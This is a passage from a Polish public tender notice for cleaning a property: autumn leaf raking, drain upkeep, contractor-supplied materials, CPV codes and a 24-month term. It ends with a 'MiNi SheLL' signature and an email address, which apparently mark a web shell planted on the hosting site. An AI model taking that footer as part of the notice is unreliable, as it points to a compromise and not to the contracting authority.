3.7 Prace wykonywane w sezonie jesiennym - z częstotliwością gwarantującą czystość terenu nieruchomości, nie rzadziej jednak niż dwa razy w tygodniu w okresie opadów liści :
-	grabienie i usuwanie z terenów nieruchomości opadłych liści,
-	utrzymanie pełnej drożności kratek ściekowych.

4.   Materiały niezbędne do wykonania zamówienia (Dostarczane przez Wykonawcę):
-	worki na śmieci - bardzo mocne, czarne, 35 i 60 L,
-	środki do mycia i dezynfekcji - proszki, płyny, żele,
-	pozostałe środki myjąco-czyszczące,
-	piasek + sól lub dopuszczone środki chemiczne.
-	kosiarka, 
-	sprzęt do zgarniania liści i odśnieżania,
-	mydło w płynie, ręczniki papierowe i papier toaletowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.91.92.00-4, 90.61.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com